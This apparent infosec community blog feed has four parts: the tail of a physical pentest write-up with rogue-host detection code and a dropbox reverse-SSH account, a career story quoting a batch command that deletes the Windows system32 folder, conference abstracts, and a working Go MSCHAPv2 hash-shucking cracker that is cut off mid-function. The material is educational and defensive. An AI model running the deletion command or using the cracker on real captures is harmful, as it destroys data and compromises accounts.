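def find_rogues(neigh_text, inventory=KNOWN_ASSETS, ouis=SUSPICIOUS_OUIS):
    """Flag every resolved host whose MAC is not in the asset inventory."""
    findings = []
    for ip, mac, state in parse_neigh(neigh_text):
        if mac in inventory:
            continue
        vendor = ouis.get(mac[:8])
        if vendor:
            reason = f"unknown host with {vendor} OUI"
        else:
            reason = "unknown host, not in inventory"
        findings.append(Finding(ip, mac, state, reason))
    return findings


if __name__ == "__main__":
    for f in find_rogues(SAMPLE_NEIGH):
        print(f"{f.ip} {f.mac} [{f.state}]: {f.reason}")
```

Run it against a fresh export of the store segment each shift; a static-address drop box is only invisible if nobody compares what is answering ARP with what is supposed to be there.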
<h4 id="failures">Failures</h4>
<ul>
<li>No Internet connectivity on any of the computers, servers or dropbox (no reverse shell, no reverse SSH).</li>
<li>Mimikatz didn’t work because the versions of the operating systems were so outdated.</li>
<li>PowerView was not available on the server or workstation.</li>
</ul>
<p>I decided to limit my time to about an hour on site, before I made contact with the manager again. I explained that I couldn’t determine yet what the issue was, and that I would have to come back later, or the following day. They were quite happy with this, so I left.</p>
<p>On the way out, I greeted the security guard again, and he must’ve felt comfortable with my presence, because he did not search my bags on the way out.</p>
<h3 id="back-to-the-drawing-board">Back to the drawing board</h3>
<p>We needed a way to access my dropbox once it was connected to their network. We decided to put a 3G router in the dropbox container as well, which would then give it connection to the Internet. This way the reverse SSH and VPN connection would run through that 3G connection, while still giving access to the local network via the network cable.</p>
<p>I also got a version of Mimikatz onto my flash drive that should work on the older operating systems.</p>
<p>As with the previous visit to the store, just before I reach the doorway of the store, I have the same rush of thoughts of everything that could go wrong. It’s amplified this time because at the entrance they have “cash in transit” security guards busy loading money from an ATM. For some reason the big guns they are carrying make it an especially scary moment for me. I force myself not to hesitate though, because I don’t want my nervousness to set these guys off.</p>
<h4 id="a-side-note-4">A side note</h4>
<p>In our country, “cash in transit” security guards are often (daily) targeted because of the valuable items they transport. It’s for this reason that they are extra alert.</p>
<p>I pass them and by the time I walk past the security guard, this time just greeting him in passing, I am focused again.</p>
<p>I make my way to the manager to just let them know I am back, and proceed to the server room. I start getting my stuff unpacked, and I hook my dropbox directly into the network switch again. Within a minute or so, I pick up that the reverse SSH connection had successfully established, and I can access the dropbox from our C2 server.</p>
<p>While trying to get Mimikatz to run on the server (which for some reason still doesn’t want to), an automated task starts up and displays information on the screen. I take note of a username and password that appear on the screen. It’s cleartext credentials for another server.</p>
<p>With remote access gained, I head back to the office to move onto the next phase.</p>
<h3 id="lets-start">Let’s start</h3>
<p>The first thing I do is start with device enumeration, to see what devices and IP ranges I can access. It goes well for a few minutes, and then it freezes. I lose access, and cannot get it back. I decide to leave it for a while, to see if it comes back up.</p>
<p>When I was at the store on this day, I noticed that in the server room it was extremely hot. It’s worth noting the server room is just a little room, with no air conditioning. I realised that the Pi must be freezing up because of the heat.</p>
<p>After an hour, there is still nothing.</p>
<h3 id="nope-lets-try-again">Nope, let’s try… again</h3>
<p>I decide that because I basically have carte blanche in their offices, and no one really pays any attention to me because they are all familiar with me by this time, I might as well just set up a laptop with Kali, and go put it in the server cabinet. There is no need for any stealth at this stage.</p>
<p>I set up a laptop with the same reverse connection functionality as the dropbox.</p>
<p>I head back with my laptop, hook it up into the server cabinet, make sure I have remote access, and head back to the office. By now I have been there so many times I feel like I actually belong there, so it doesn’t even cross my mind that I’m not supposed to be there.</p>
<h3 id="finally">Finally</h3>
<p>Once I was back at the office the actual work of hacking could start. We figured out we could access the complete network, and very soon after our initial discovery scanning we were able to compromise the Active Directory domain.</p>
<p>We were able to determine a number of ways we can compromise the domain controller, including a path that involved using the credentials we obtained from the phishing attack.</p>
<h4 id="a-side-note-5">A side note</h4>
<p>It’s worth noting that compromising the domain controller without valid credentials initially is a lot more worrisome. This means that we could’ve skipped the whole phishing and vhishing attack to gain credentials and still be successful.</p>
<p>The laptop was fetched from the store a short while after, again without any questions being asked why IT equipment was being carried out the store.</p>
<h3 id="lessons-i-learned">Lessons I learned</h3>
<ul>
<li>Be prepared for anything</li>
<li>Roll with whatever happens</li>
<li>If you can establish a rapport with someone, you are seen as a “familiar”</li>
<li>Be confident and act like you belong</li>
</ul>
<h3 id="protecting-your-company">Protecting your company</h3>
<ul>
<li>Enable 2FA for any login portals that are accessible from the Internet</li>
<li>When a phishing attack is noticed, communicate by means other than email that an attacker might have access to</li>
<li>Provide ongoing training to staff members about phishing and vhishing attacks, carefully explaining to them the impact</li>
<li>Make sure policies are in place to cater for external service providers’ access to stores</li>
<li>Do not neglect physical access security</li>
<li>Segment the network in such a way that compromising one store does not give the attacker access to the complete network</li>
</ul>chrismeistreGetting into Infosec/Cyber Security2021-11-24T00:00:00+00:002021-11-24T00:00:00+00:00https://hacksouth.africa/careers/getting-into-infosec<p><img src="/assets/images/getintoinfosec/preview2.jpg" alt="Preview" class="align-center" /></p>
<p><strong>My journey into cyber security/infosec.</strong><br />
By <strong>Sp3ctrlM0nki3</strong></p>
<p>So, I’ll start at the beginning. My passion for cyber sec started in a computer lab in high school where I created my first ‘virus’. It was a little <strong><span style="color: yellow">.bat</span></strong> virus which would remove the <strong><span style="color: yellow">System 32 Folder</span></strong> from your Windows system.
<strong><span style="color: yellow"><code>del c:\WINDOWS\system32\*.* /q</code>[1]</span></strong><br />
<!--more--></p>
<h3 id="tldr">TL;DR</h3>
<p><a href="https://hacksouth.africa/community/Getting-into-Infosec-Cyber-Security/#step-2-The-Learning-Curve">The Learning Curve</a><br />
<a href="https://hacksouth.africa/community/Getting-into-Infosec-Cyber-Security/#step-3-Skills-loading-in-progress">Skills loading in progress</a><br />
<a href="https://hacksouth.africa/community/Getting-into-Infosec-Cyber-Security/#step-4-The-Wild-Hunt">The Wild Hunt</a><br />
<a href="https://hacksouth.africa/community/Getting-into-Infosec-Cyber-Security/#step-5-He-shoots-He-scores">He shoots, He scores</a><br />
<a href="https://hacksouth.africa/community/Getting-into-Infosec-Cyber-Security/#step-6-Mamma-I-made-it">Mamma I made it</a><br />
<a href="https://hacksouth.africa/community/Getting-into-Infosec-Cyber-Security/#step-7-Pay-It-Forward">Pay It Forward</a><br />
<a href="https://hacksouth.africa/community/Getting-into-Infosec-Cyber-Security/#step-8-Be-a-Part-of-Something-Great">Be a Part of Something Great</a></p>
<p>From there I was hooked, but unfortunately in the pursuit of career vs. passion, career won, and cyber sec had to take a back seat – although it never left.
Fast forward many years and I find myself the victim of a global pandemic [along with many others]: with the onset of COVID-19, I lost my job, and the world went into lockdown. I was left with the daunting question of what to do now. I had spent most of my working career in the hospitality sector, dabbling here and there in the IT sphere.
In my previous position I was the Contracts & Negotiation Manager for a tour company, but also IT support/helpdesk, the IT liaison for our external supplier, database admin, as well as IT procurement. Clearly an abuse of my passion by the company, but I digress.</p>
<p><img src="https://media.giphy.com/media/q1mHcB8wOCWf6/giphy.gif" alt="Homer Studying" class="align-center" /></p>
<h3 id="the-learning-curve">The Learning Curve</h3>
<p>So, left with the decision of what to do now, I took this as the opportunity to pursue my passion for cyber security. I now had the opportunity, and this was it: I took everything I had and invested in myself, studying and learning all that I could. Between April 2020 and October 2020 I studied remotely and earned 14 certifications/course certificates, ranging from <strong><span style="color: yellow">A+ / N+ / Sec+ / Server+ / CASP+ / CISA / CySA+ / CCNA and my CEH v10</span></strong></p>
<p>Tangent to my story, I did not pursue the CompTIA A+ N+ etc. recognition certification because during my studies, I decided that I wanted to do pentesting/hacking. And from what I understand, you only need to understand the networking and server concepts but don’t really need to have the CompTIA recognition - It’s probably nice to have.</p>
<p>What I wanted is basically, I wanted to break into things legally and get paid to do it. Why you may ask, because no system will be the same, no network will be the same, environments are forever changing and each new one brings on a new challenge and that’s what I wanted.</p>
<p>So, I now had certifications, what now? I studied hard but I have no practical skills, no way of practicing either since we only had 1 laptop in the house, and it was my wife’s work laptop. So, trying to hack her laptop or messing around with potentially dangerous items could be detrimental to her business.</p>
<p><img src="https://media.giphy.com/media/hL9q5k9dk9l0wGd4e0/giphy.gif" alt="Loading" class="align-center" /></p>
<h3 id="skills-loading-in-progress">Skills loading in progress</h3>
<p>This is when I discovered TryHackMe <a href="https://tryhackme.com/">THM</a> and HackTheBox <a href="https://www.hackthebox.com/">HTB</a>. TryHackMe was my go-to platform since they offered a more convenient option when practicing skills than HackTheBox at the time – it could be different now, I’m not sure. But I made sure I at least did one machine a day in THM to keep my skills relevant [on free only, because broke]. I nicely got my rank up and got my skill level to a decent level for any entry level job, or so I thought.</p>
<p>Another tangent – in the time of THM and HTB, I also discovered HackerOne and Hacker101 [for CTFs], and the YouTube channels of <a href="https://www.youtube.com/c/TheCyberMentor">The Cyber Mentor</a>, whom I had been following long before I got into cyber sec, <a href="https://www.youtube.com/c/JohnHammond010">John Hammond</a>, <a href="https://www.youtube.com/c/DavidBombal">David Bombal</a>, <a href="https://www.youtube.com/c/HackerSploit">HackerSploit</a> and <a href="https://www.youtube.com/c/NullByteWHT">NullByte</a>. I also learnt that I needed to re-evaluate my Twitter account to tailor it to my passion, as well as learn Discord and get involved in groups there.</p>
<p><img src="https://media.giphy.com/media/EQKtfl2Np0ME05furr/giphy.gif" alt="Unemployment" class="align-center" /></p>
<h3 id="the-wild-hunt">The Wild Hunt</h3>
<p>Now the real challenge was about to begin, and this was finding and landing that first job in cyber sec, and to make it even harder, let’s do it during a pandemic. I had more failures than successes in this area, <span style="color: yellow">but more on that later</span>, and it was starting to feel like it was never going to happen. I had my CV on all the ‘major’ recruitment sites and I was looking for any entry-level job within infosec. I was searching for keywords such as: Entry Level / No experience / Minimal experience / willing to learn / remote / work from home. Job titles I searched for started out like the following: Junior Pen tester / Cyber Sec Analyst / IT Analyst / Pentester / Blue Teamer / SOC Analyst / IT Security Analyst. There were instances where I received some communication regarding an application, first-round interviews, very few screening calls, but unfortunately I still had no luck.</p>
<p>I then switched up the search criteria on titles to the following in the hope of landing more interviews. I started searching: Database admin / IT admin / IT support / IT helpdesk, because I had experience in these areas and thought that if I could get my foot in the door, I could work my way up into where I wanted to be.</p>
<p>This also didn’t help, I was still in the same position as before, the change didn’t make any difference. I still wasn’t getting any interviews or callbacks etc. One thing I did learn however from changing my search titles, was that I was selling myself short. If you want to be in infosec, persevere, search for that title, search for that job, go after that company and don’t deviate.</p>
<p>I eventually started sending my CV to companies who weren’t looking and said that when they are ready to open the doors for new people to keep me in mind.
<strong><span style="color: yellow">“You lose 100% of the chances you don’t take”[2]</span></strong></p>
<p>This stuck with me throughout my journey: I figured that if I backed myself to study and make it through that, I should back myself in my pursuit to find that job.
<strong><span style="color: cyan">Stats for the geeks:</span></strong></p>
<p>Just a few rough numbers to paint a picture of how difficult it was to get into infosec, in an entry level position.
<span style="color: cyan">In 2020:</span></p>
<table>
<tbody>
<tr>
<td>Jobs applied for</td>
<td>&gt; 180 [approx.]</td>
</tr>
<tr>
<td>Rejections</td>
<td>&gt;= 126 [approx.]</td>
</tr>
<tr>
<td>Feedback [good/bad]</td>
<td>&lt; 50 [from recruiters regarding my application]</td>
</tr>
<tr>
<td>Interviews</td>
<td>17</td>
</tr>
<tr>
<td>2nd Round Interviews</td>
<td>4</td>
</tr>
<tr>
<td>Job Landed</td>
<td>0</td>
</tr>
</tbody>
</table>
<p>As you can see it was a really grim picture to the point where at the end of 2020, somewhere around mid-November, I decided to take a break from applying and searching for jobs. I then started looking at how I could stand out from the rest in 2021.</p>
<p>I started looking at how I could make myself more marketable and also started asking people in the industry what it was that I was doing wrong and how to go about getting noticed. I reached out to a few people in the Twitter sphere and, I will be honest, very few came back to help. One person who did help me was <a href="https://twitter.com/4n6lady">4n6lady</a>. She asked for my CV at the time and took the time to give me a few pointers on how to tailor my CV to promote my skills, the platforms I’d been using, tools and experience, to help me land that job in infosec.</p>
<p>With her advice and the help of my wife, I modified my CV highlighting my skills and all the necessary tools that I have been using. The platforms that I have been practising on [THM and HTB], and the communities that I belonged to.</p>
<p>I also took the time to learn a programming language, as this would make pentesting easier going forward. I started a few Python programming courses in the beginning of January 2021 and finished all 4 courses by the end of March 2021.</p>
<p>So with a revitalised mind set after my December break, the new look CV - modified to catch the eye of the right recruiter and a few additional feathers in my cap for Infosec, I was back on the prowl and looking for the right job.</p>
<p><img src="https://media.giphy.com/media/3otPoN361gYGbwqNgc/giphy.gif" alt="He shoots he scores" class="align-center" /></p>
<h3 id="he-shoots-he-scores">He shoots, He scores</h3>
<p>My job hunting began with new vigour and new hope; my CV went out and I set alerts for myself on the various platforms, so that as soon as something new went live I would get it immediately and apply.</p>
<p>It was slow in the beginning but I eventually came across a <strong><span style="color: yellow">status post</span></strong> on LinkedIn that they were looking for consultants who wanted to get into infosec – little to no experience required and would be willing to help with certifications if you have none.</p>
<p>I thought this is it: if I can’t land this then I need to really re-evaluate what I’m looking for and where I want to be [I’m sure some of you have hit this wall before]. I sent my CV, had an interview, waited a very long time – almost an eternity – for feedback, any feedback really. And I got the job as a contractor for 6 months with the company, as a cyber security consultant – which evolved into a 12-month contract [currently in progress] for Infosec Consulting ZA.</p>
<p>The company has since grown and we now have 6 consultants in total, with varying levels of experience, ranging from 0 to 20 years. Some with certifications and some without, the CEO/Director of the company Bevan Lane, has lived up to his promise of helping you with certifications. I am now an ISO/IEC 27001 Lead Implementer, certified by PECB.
<span style="color: yellow">My next ambitious step is to get my OSCP and if I can create a little pentest division within this company.</span></p>
<p><img src="https://media.giphy.com/media/g9582DNuQppxC/giphy-downsized-large.gif" alt="The Great gatsby" class="align-center" /></p>
<h3 id="mamma-i-made-it">Mamma I made it</h3>
<p>I’m happy to have made it into infosec; it’s a tough industry to get into and the strange part is – it’s a known problem. After getting into the industry, somehow my social media channels knew I had made it in and I started seeing posts about how tough it is to get into cyber sec/infosec.</p>
<p>Posts about the ‘gatekeepers’ of infosec and companies searching for candidates who could do it all, had it all and were willing to take home less than what they were valued. I could believe what I was reading, but I could relate because I went through this.</p>
<p>I understand that HR won’t always know what to look for, understand the terms and that sometimes job ads are just cut and paste, but it shouldn’t be so hard. I have also heard of the recruiters who, when reviewing a CV, use CTRL+F and search your CV for the keywords they put in the job ads, and if it’s not there you get ‘tossed’ to the side never to be looked at again – unless they are desperate.</p>
<p>I’m not saying companies should take anyone, but at least give the CV a proper review and if the candidate doesn’t have what it takes to be in your company RIGHT NOW, give them that constructive criticism/feedback.</p>
<p>I would have loved it if someone told me what I was doing wrong in my applications or what areas I needed to focus to stand a better chance to land that interview.
So here are my tips to you:</p>
<ol>
<li>
<p>Modify your CV to highlight your skills:<br />
Tools – Nmap, Wireshark, Burpsuite etc.<br />
OS that you are familiar with – Windows / Linux / macOS<br />
platform you are familiar with – THM / HTB / Hacker1 etc.</p>
</li>
<li>Learn a programming language, enough to be able to read the code and understand at least 80% of it and add it as part of your skills.</li>
<li>Put the important things first, credentials should be on the first page of your CV along with the items I have mentioned.</li>
<li>Put your most recent duties, from your previous job or current job, on the first page as well – recruiters will want to see what you are doing now rather than what you did. You want to hook them to your CV and once they are there, they can read the rest.</li>
<li>Ask someone who is in the industry if they would mind reviewing your CV, try for someone who has a position you want. Don’t be discouraged if you don’t get a response, but don’t stop asking.</li>
<li>Highlight your Expertise, list the things you’re good at – this is the time to boast about how good you are in certain areas.</li>
<li>Don’t lie on your CV, a very basic tip but also very important – if you can’t do something, be honest and say so. It shows integrity and that you are aware of what you need to work on.</li>
<li>Do your research on Colleges/Institutions that you’re thinking of using for your studies, not all of them are accredited or recognized by any specific body.</li>
</ol>
<p>Do all the above and keep applying; it will eventually happen for you like it did for me. It’s easy to say this now sitting on the other side, but I went through countless applications and endless rejections [I’m currently still getting rejection emails from companies I applied to last year]. But all I needed was someone to take a chance on me, and someone will take a chance on you.</p>
<p><strong>Footnote</strong><br />
I would like to give a shoutout to all the people who helped me, in their own way, to get me here.<br />
Leigh Botha – Director of L&S People Solutions<br />
Bevan Lane – Director of Infosec Consulting ZA<br />
<a href="https://twitter.com/4n6lady">4n6lady</a> – Twitter contact who helped me with insight into getting into the industry.</p>
<p>You all made it possible.</p>
<p>Thank you for reading to the end but before you leave take a moment to check out the below, you’ll thank me later.</p>
<p><img src="https://media.giphy.com/media/YOvOkaS5ZKfimDIgwJ/giphy.gif" alt="Bad_Boys" class="align-center" /></p>
<h3 id="pay-it-forward">Pay It Forward</h3>
<p>If you have the knowledge and skills but need that extra boost to get certified, then check out <a href="https://hacksouth.africa/community/Pay-It-Forward/">this blog</a>, Hack South is giving away a limited amount of PWK vouchers.</p>
<p><img src="/assets/images/OSCP/oscp.png" alt="OSCP" class="align-center" /></p>
<h3 id="be-a-part-of-something-great">Be a Part of Something Great</h3>
<p>If you want to be part of a growing community of Hackers/Tech Enthusiasts/Tinkerers and all round great people then <a href="https://hacksouth.africa/community/Joining-Hack-South/">join</a> the <a href="https://hacksouth.africa/">Hack South</a> Discord.</p>
<p>[1] The code is for reference and educational purposes only, I take no responsibility for the malicious use of the code by the reader.<br />
[2] This is an adaptation of Wayne Gretzky’s - You miss 100% of the shots you don’t take.</p>
Sp3ctrlM0nki3
0xcon 2021 2021-11-10T00:00:00+00:00 2021-11-10T00:00:00+00:00 https://hacksouth.africa/conferences/0xcon-2021
<p>Taking place on Saturday, <strong>13 November</strong> 2021 from <strong>09:00 to 15:00</strong> (SAST).</p>
<p>0xcon started in 2017 as a South African conference aimed at building the Gauteng and ZA infosec community. The conference welcomes both the new and experienced alike, and works hard to keep things open and free to everyone.</p>
<p>Due to the pandemic, this year’s conference will be streamed to YouTube with discussion on the <a href="https://discord.gg/hacksouth">Hack South Discord server</a>.
<!--more--></p>
<h2 id="how-to-participate">How to participate</h2>
<ul>
<li>Check out our <a href="https://www.linkedin.com/events/0xcon20216859938708657844224/">LinkedIn event and RSVP</a>. Share this with your friends and colleagues!</li>
<li>On the day, the event will be <a href="https://www.youtube.com/watch?v=vPsx83lhd6w">streamed on YouTube</a></li>
<li>Please join <a href="https://discord.gg/hacksouth">Hack South Discord server</a> for discussion and questions during the event.</li>
<li>We will host some polls on Discord to gauge how people feel about certain topics…</li>
</ul>
<h3 id="event-program">Event Program</h3>
<p><img src="/assets/images/0xcon/2021program.jpg" alt="Program" class="align-center" /></p>
<h2 id="unlocking-keeloq---rogan-dawes">Unlocking KeeLoq - Rogan Dawes</h2>
<p>KeeLoq Remote Keyless Entry systems make use of radio frequency transmissions to operate and have many known weaknesses. This presentation is a journey into bringing existing research together with manufacturer documentation to make implementing a complete Keeloq solution practical, ultimately repurposing a commercial receiver as part of a home automation system integration project.</p>
<p>I will demonstrate how I recovered the manufacturer key by extracting and reverse engineering the receiver’s firmware using a JTAG adapter and Ghidra. Next, I will cover decoding and decrypting the KeeLoq transmissions (verified using a logic analyzer), cloning the captured serial and sequence numbers to a new transmitter, and finally, how to export the received transmissions to a home automation system via an add-on WiFi-capable microcontroller.</p>
<p><em>About Rogan</em></p>
<p>Rogan Dawes is a senior researcher at SensePost and has been hacking since 1998, which, coincidentally, is also the time he settled on a final wardrobe. He used the time he saved on choosing outfits to live up to his colleague’s frequent joke that he has an offline copy of the Internet in his head. Rogan spent many years building web application assessment tools, and is credited as having built one of the first and most widely used intercepting proxies; WebScarab. In recent years, Rogan has turned his attentions towards hardware hacking; and these days many suspect him to be at least part cyborg. A good conversation starter is to ask him where he keeps his JTAG header</p>
<h2 id="2021-year-in-review---the-year-of-the-supply-chain---jared-naude">2021 Year in Review - The year of the Supply Chain - Jared Naude</h2>
<p>Looking back at events that have taken place for lessons that can be learned is an important ingredient to enable forward insight, especially in the cyber security space. In this talk, I will go through the various security news, events and incidents of note that occurred in 2021 while adding some commentary and analysis from myself. This will primarily focus on the various supply chain attacks (SolarWinds, Codecov, Kaseya, etc) but will also cover trends in ransomware and malware, disinformation and Apple’s CSAM debacle.</p>
<p><em>About Jared</em></p>
<p>Jared is a Cloud Architect that specializes in enterprise cloud architecture and security; he is passionate about helping large organizations with architecting, building, securing and operationalizing cloud environments. Jared’s research interests and policy advocacy work involves cyber security issues that touch national security interests such as encryption, privacy, surveillance and disinformation.</p>
<h2 id="why-the-options-pattern-is-great-for-security---dima-kotik">Why the Options Pattern is Great for Security - Dima Kotik</h2>
<p>Secure coding and functional programming are rarely mentioned in the same sentence. What if by applying a functional programming construct, we could write more secure code? Enter the Options Pattern, a hidden gem in securing your approach to object initialization.</p>
<p>The options pattern is a modern object initialization idiom. It involves writing a set of second-order functions returning options that roughly correspond to the initialization parameters. An option receives the object for initialization and applies a narrow modification to it.</p>
<p>The options pattern provides security benefits as side effects of encapsulation and separation of concerns. The main benefit is that it can make complex objects difficult to misuse, a necessary quality for modern cryptography, networking, and low-level libraries. It aids with code readability, reliability, and resilience. When properly implemented, the options pattern ensures sensible defaults, detects configuration conflicts at initialization, and provides logical grouping and consistency with entangled parameters.</p>
<p>In this talk, the speaker will explain how wider adoption of the options pattern improves code security for any project. Several examples will be examined and described as a demonstration of how to properly apply the secure coding options pattern in your own code.</p>
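<p>To make the abstract concrete, here is an added example in Go of the functional options pattern it describes. It is written for this page and is not code from the talk or from Security Journey. The <code>Client</code> type, its fields and the option names are hypothetical and exist only to illustrate the three properties the abstract lists: secure defaults, validation of each parameter inside its option, and conflict detection at initialization so that a contradictory configuration never produces a usable object.</p>

```go
package main

import (
	"crypto/tls"
	"errors"
	"fmt"
	"time"
)

// Client is a hypothetical HTTPS client configuration used only to illustrate
// the pattern; it is not a type from any real library.
type Client struct {
	Timeout            time.Duration
	MinTLSVersion      uint16
	InsecureSkipVerify bool   // disables certificate verification
	CAFile             string // path of a private CA bundle to trust (never opened here)
}

// Option applies one narrow, validated change to a Client under construction.
// Returning an error lets a bad value fail at initialization rather than at use.
type Option func(*Client) error

// WithTimeout rejects values that would disable the timeout entirely.
func WithTimeout(d time.Duration) Option {
	return func(c *Client) error {
		if d <= 0 {
			return errors.New("timeout must be positive")
		}
		c.Timeout = d
		return nil
	}
}

// WithMinTLSVersion refuses to lower the floor below TLS 1.2.
func WithMinTLSVersion(v uint16) Option {
	return func(c *Client) error {
		if v < tls.VersionTLS12 {
			return fmt.Errorf("minimum TLS version %#x is below TLS 1.2", v)
		}
		c.MinTLSVersion = v
		return nil
	}
}

// WithCAFile pins trust to a private CA bundle.
func WithCAFile(path string) Option {
	return func(c *Client) error {
		if path == "" {
			return errors.New("CA file path must not be empty")
		}
		c.CAFile = path
		return nil
	}
}

// WithInsecureSkipVerify is named so that its presence is obvious in code review.
func WithInsecureSkipVerify() Option {
	return func(c *Client) error {
		c.InsecureSkipVerify = true
		return nil
	}
}

// NewClient starts from secure defaults, applies the options in order, then
// checks for conflicting combinations before handing back a usable object.
func NewClient(opts ...Option) (*Client, error) {
	c := &Client{Timeout: 30 * time.Second, MinTLSVersion: tls.VersionTLS12}
	for _, opt := range opts {
		if err := opt(c); err != nil {
			return nil, err
		}
	}
	if c.InsecureSkipVerify && c.CAFile != "" {
		return nil, errors.New("WithCAFile and WithInsecureSkipVerify conflict: pinned trust with no verification is meaningless")
	}
	return c, nil
}

func main() {
	// /etc/ssl/corp-ca.pem is a placeholder path; the file is never read.
	good, err := NewClient(WithTimeout(5*time.Second), WithCAFile("/etc/ssl/corp-ca.pem"))
	fmt.Printf("ok: %+v err=%v\n", good, err)

	_, err = NewClient(WithCAFile("/etc/ssl/corp-ca.pem"), WithInsecureSkipVerify())
	fmt.Println("conflict detected:", err)

	_, err = NewClient(WithMinTLSVersion(tls.VersionTLS10))
	fmt.Println("weak setting rejected:", err)
}
```

<p>The security property comes from the shape of the code rather than from any one check: a caller cannot reach a half-configured <code>Client</code>, every field is set either by a default or by a function that validated it, and the cross-field rule lives in exactly one place, the constructor, instead of being re-derived by every call site.</p>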
<p><em>About Dima</em></p>
<p><a href="https://twitter.com/dkotik">Dima Kotik</a> is an application security engineer and lead curriculum contributor for Go, Python, and ES6 at <a href="https://twitter.com/SecurityJourney">@SecurityJourney</a>. Aspiring to become a gentle FOSS maverick by age 60.</p>
<h2 id="assless-chaps-a-novel-combination-of-prior-work-to-crack-mschapv2-fast-or-why-mschapv2-is-so-broken-its-showing-its-whole-ass---dominic-white--michael-kruger">Assless Chaps: a novel combination of prior work to crack MSCHAPv2, fast (or why MSCHAPv2 is so broken, its showing its whole ass) - Dominic White & Michael Kruger</h2>
<p>Cracking intercepted MSCHAPv2 challenge/response pairs from Wi-Fi or VPN attacks has long been known to be possible. However, unless the underlying cleartext password was common, this can take frustratingly long. Especially, for at-the-same-time attacks like <a href="https://sensepost.com/blog/2015/improvements-in-rogue-ap-attacks-mana-1%2F2/" title="Improvements in Rogue AP attacks">the auto-crack-and-add we proposed in 2014</a> <a href="https://youtu.be/i2-jReLBSVk?t=1380" title="Manna from Heaven">and presented at DEF CON</a>. We’ll combine some prior work and release tooling to show how even extremely large hashlists can be run through in seconds.</p>
<p>MSCHAPv2 has several weaknesses. The first is that one doesn’t need the clear-text password: merely having the MD4 hash (aka NT hash) of the password is good enough to prove to either a client or authenticator that you know the password. This means we can use a <a href="https://www.youtube.com/watch?v=OQD3qDYMyYQ" title="What the Shuck? Layered Hash Shucking">technique proposed in 2020 by Sam Croley called hash shucking</a> to use large NT hash lists such as the <a href="https://haveibeenpwned.com/Passwords" title="Pwned Passwords">Have I Been Pwned set</a> to determine the NT hash used in the exchange. We’ll go through the theory of MSCHAPv2, why the NT hash is useful and how to use it, as well as how Hashcat modes for cracking it were developed.</p>
<p>The second weakness relates to the <a href="https://web.archive.org/web/20160120152007/http://cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/" title="Divide and Conquer: Cracking MS-CHAPv2">work done by Moxie Marlinspike and David Hulton in 2012</a> where they found that because MSCHAPv2 breaks the NT hash into three parts, and pads the last two bytes with NULLs, it’s trivial to brute force this part (the ass). Then a brute force of the first two parts is performed using only a single DES round by iterating the entire DES keyspace with an FPGA. However, most of us still don’t have our own MSCHAPv2 cracking FPGA rigs, and this attack isn’t widely available or practical. Instead, if we limit our input hashlist to only those with the matching last two bytes, we can perform a far more efficient hash shucking attack against the exchange. We will go through the theory of MSCHAPv2 in use here and the optimisations devised with an associated tool.</p>
<p>Finally, we’ll end on why we think MSCHAPv2 needs to finally die the death it has deserved for so very long.</p>
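<p>The two weaknesses the abstract combines can be shown end to end in a few dozen lines. The following is an added example written for this page in Go; it is not the speakers’ tooling and makes no attempt at their performance. It implements the RFC 2759 response computation (the NT hash zero-padded to 21 bytes and split into three 7-byte DES keys), recovers the last two hash bytes by brute-forcing the 2^16 possible third keys, and then uses those two bytes to filter a candidate NT hash list before doing a full response check on the survivors, which is the shucking step. The username, challenges and NT hash are the RFC 2759 section 9.2 test vector (password “clientPass”); the candidate hash list is a constructed stand-in for a real list such as the HIBP NT hashes, with one decoy that deliberately shares the real hash’s last two bytes.</p>

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
)

// desKey7to8 expands a 7-byte (56-bit) key into the 8-byte layout crypto/des
// expects. DES discards the low bit of every key byte (the parity bit), so the
// 56 key bits are spread across the high 7 bits of each output byte.
func desKey7to8(k7 []byte) []byte {
	k := make([]byte, 8)
	k[0] = k7[0] & 0xFE
	k[1] = (k7[0]<<7 | k7[1]>>1) & 0xFE
	k[2] = (k7[1]<<6 | k7[2]>>2) & 0xFE
	k[3] = (k7[2]<<5 | k7[3]>>3) & 0xFE
	k[4] = (k7[3]<<4 | k7[4]>>4) & 0xFE
	k[5] = (k7[4]<<3 | k7[5]>>5) & 0xFE
	k[6] = (k7[5]<<2 | k7[6]>>6) & 0xFE
	k[7] = (k7[6] << 1) & 0xFE
	return k
}

// desEncrypt encrypts one 8-byte block under a 7-byte key.
func desEncrypt(k7, block []byte) []byte {
	c, err := des.NewCipher(desKey7to8(k7))
	if err != nil {
		panic(err) // only possible with a wrong key length
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// challengeHash is RFC 2759 ChallengeHash():
// SHA1(PeerChallenge || AuthenticatorChallenge || UserName) truncated to 8 bytes.
func challengeHash(peer, auth []byte, user string) []byte {
	h := sha1.New()
	h.Write(peer)
	h.Write(auth)
	h.Write([]byte(user))
	return h.Sum(nil)[:8]
}

// ntResponse is RFC 2759 ChallengeResponse(): the 16-byte NT hash is
// zero-padded to 21 bytes, cut into three 7-byte DES keys, and each key
// encrypts the 8-byte challenge. The third key is 2 real bytes plus 5 NULs.
func ntResponse(ntHash, chal []byte) []byte {
	padded := make([]byte, 21)
	copy(padded, ntHash)
	resp := make([]byte, 0, 24)
	for i := 0; i < 21; i += 7 {
		resp = append(resp, desEncrypt(padded[i:i+7], chal)...)
	}
	return resp
}

// recoverTail brute-forces the last two bytes of the NT hash from the third
// response block: only 2^16 keys of the form hash[14..15] || 00 00 00 00 00 exist.
func recoverTail(chal, resp []byte) ([2]byte, bool) {
	key := make([]byte, 7)
	for v := 0; v < 1<<16; v++ {
		key[0], key[1] = byte(v>>8), byte(v)
		if bytes.Equal(desEncrypt(key, chal), resp[16:24]) {
			return [2]byte{key[0], key[1]}, true
		}
	}
	return [2]byte{}, false
}

// shuck keeps only the hashes whose last two bytes equal the recovered tail
// (a 1-in-65536 filter on a large NT hash list) and verifies each survivor
// against the full 24-byte response. It returns the matching hash and how
// many candidates actually needed a full response computation.
func shuck(ntHashes [][]byte, chal, resp []byte) (match []byte, tested int) {
	tail, ok := recoverTail(chal, resp)
	if !ok {
		return nil, 0
	}
	for _, h := range ntHashes {
		if h[14] != tail[0] || h[15] != tail[1] {
			continue
		}
		tested++
		if bytes.Equal(ntResponse(h, chal), resp) {
			return h, tested
		}
	}
	return nil, tested
}

func mustHex(s string) []byte {
	b, err := hex.DecodeString(s)
	if err != nil {
		panic(err)
	}
	return b
}

func main() {
	// RFC 2759 section 9.2 test vector: UserName "User", password "clientPass".
	// The response is computed here rather than captured.
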